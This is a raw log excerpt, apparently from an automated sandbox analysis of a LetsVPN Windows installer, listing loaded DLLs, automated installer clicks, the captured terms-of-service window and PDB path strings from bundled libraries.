              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: usp10.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: msls31.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: textinputframework.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: coreuicomponents.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: coremessaging.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: textshaping.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: linkinfo.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: ntshrui.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: cscapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devrtl.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: spinf.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: drvstore.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: newdev.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cabinet.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpnpmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: ntmarta.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: drvstore.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: cabinet.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: ntmarta.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: drvstore.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: devobj.dll
              Source: C:\Windows\System32\drvinst.exe Section loaded: cabinet.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netsetupsvc.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netsetupapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netsetupengine.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: implatsetup.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: devrtl.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: spinf.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: drvstore.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Section loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
              Source: C:\Users\user\Desktop\letsVPN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
              Source: C:\Windows\System32\mmc.exe Window found: window name: msctls_updown32
              Source: C:\ProgramData\letsvpn-latest.exe Automated click: Next >
              Source: C:\ProgramData\letsvpn-latest.exe Automated click: I Agree
              Source: C:\ProgramData\letsvpn-latest.exe Automated click: Install
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\ProgramData\letsvpn-latest.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.10 Nullsoft Install System v3.10License AgreementPlease review the license terms before installing letsvpn.Press Page Down to see the rest of the agreement.LetsVPN Terms of ServiceThese Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services).Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services.Intellectual Property RightsThe website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved.The Scope of Software LicensingA. 
Users can install use display and run the software on PC and mobile phones (same account support different devices).B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights.C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service.User InstructionsA. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc.B. LetsVPN Accounta. You understand that it is your responsibility to keep your LetsVPN account information confidentia
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: letsVPN.exe Static PE information: Image base 0x140000000 > 0x60000000
              Source: letsVPN.exe Static file information: File size 33128448 > 1048576
              Source: letsVPN.exe Static PE information: section name: RT_CURSOR
              Source: letsVPN.exe Static PE information: section name: RT_BITMAP
              Source: letsVPN.exe Static PE information: section name: RT_ICON
              Source: letsVPN.exe Static PE information: section name: RT_MENU
              Source: letsVPN.exe Static PE information: section name: RT_DIALOG
              Source: letsVPN.exe Static PE information: section name: RT_STRING
              Source: letsVPN.exe Static PE information: section name: RT_ACCELERATOR
              Source: letsVPN.exe Static PE information: section name: RT_GROUP_ICON
              Source: letsVPN.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1ecc400
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dlll source: letsvpn-latest.exe, 00000013.00000003.2376519913.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375693525.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374330113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377335396.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377822909.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2378990816.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2425444699.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2410292995.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: letsvpn-latest.exe, 00000013.00000003.2399608066.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2449650568.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: letsvpn-latest.exe, 00000013.00000003.2329768871.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: letsvpn-latest.exe, 00000013.00000003.2419235971.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: letsvpn-latest.exe, 00000013.00000003.2442323739.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, tapinstall.exe, 0000001C.00000002.2683090826.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001C.00000000.2681003659.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000000.2683431431.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000002.2728411628.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000002.2736525094.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000000.2729197986.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2423303491.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Extract: Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2370247542.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.00000000005A9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: letsvpn-latest.exe, 00000013.00000003.2427329081.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: letsvpn-latest.exe, 00000013.00000003.2440630765.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3962172834.000000005E4F2000.00000002.00000800.01000000.00000037.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: letsvpn-latest.exe, 00000013.00000003.2326201013.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3922925338.0000000005F32000.00000002.00000001.01000000.0000001F.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: letsvpn-latest.exe, 00000013.00000003.2452801901.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2389768364.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: letsvpn-latest.exe, 00000013.00000003.2411045465.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: letsvpn-latest.exe, 00000013.00000003.2432933736.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: letsvpn-latest.exe, 00000013.00000003.2478147002.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: letsvpn-latest.exe, 00000013.00000003.2504301435.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: letsvpn-latest.exe, 00000013.00000003.2437822985.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: letsvpn-latest.exe, 00000013.00000003.2475399592.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: letsvpn-latest.exe, 00000013.00000003.2469739574.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2478147002.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2415799457.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: letsvpn-latest.exe, 00000013.00000003.2404532270.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: letsvpn-latest.exe, 00000013.00000003.2421249747.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: letsvpn-latest.exe, 00000013.00000003.2475399592.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2441430774.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: letsvpn-latest.exe, 00000013.00000003.2453541303.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000013.00000003.2540392620.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2522666956.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2541195022.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: letsvpn-latest.exe, 00000013.00000003.2505805799.0000000002832000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776314664.0000000005442000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2420610535.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: letsvpn-latest.exe, 00000013.00000003.2480597366.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
